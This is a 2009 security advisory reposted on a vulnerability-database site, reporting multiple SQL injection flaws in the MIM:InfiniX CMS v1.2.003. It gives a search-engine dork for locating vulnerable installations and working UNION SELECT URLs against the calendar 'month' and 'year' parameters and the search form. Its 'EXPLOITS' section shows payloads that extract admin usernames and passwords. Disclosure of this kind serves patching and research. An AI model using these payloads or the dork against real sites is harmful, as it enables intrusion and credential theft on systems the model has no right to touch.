Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21751
HistoryApr 29, 2009 - 12:00 a.m.

MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX v1.2.003--->

2009-04-2900:00:00
vulners.com
5
JSON

MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003–>

CMS INFORMATION:

–>WEB: http://mim.infinix.it
–>DOWNLOAD: https://sourceforge.net/projects/infinix/
–>DEMO: http://mim.infinix.it
–>CATEGORY: CMS / Portal
–>DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite Info…
in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and store…
–>RELEASED: 2009-04-21

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: "Developed by rbk"
–>CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES
–>AFFECT VERSION: 1.2.003 (maybe <= ?)
–>Discovered Bug date: 2009-04-27
–>Reported Bug date: 2009-04-27
–>Fixed bug date: 2009-04-28
–>Info patch: v1.2.003
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################

<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off ++++++++++++++++±-------->>>>

INTRO:

Admin choose to use database or not.

This CMS is completely vulnerable to SQL Injection (I only show some vars).

PROOF OF CONCEPT:

For example ("month" and "year" GET vars). Links:

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year=2009

Another example (search post form). Search this:

anything%')) union all select 1,database(),version(),user(),5,6,7,8,9,database(),11#

EXPLOITS:

We get the admin credentials:

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6
FROM admin WHERE id=1/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year=2009

anything%')) union all select 1,database(),database(),concat(user,'–::–',pass),5,6,7,8,9,database(),11 FROM admin WHERE
id=1#

#######################################################################
#######################################################################
##*******************************************************************##

ESPECIAL GREETZ TO: Str0ke, JosS, …

####
##-------------------------------------------------------------------##
####

GREETZ TO: SPANISH H4ck3Rs community!

##*******************************************************************##
#######################################################################
#######################################################################

JSON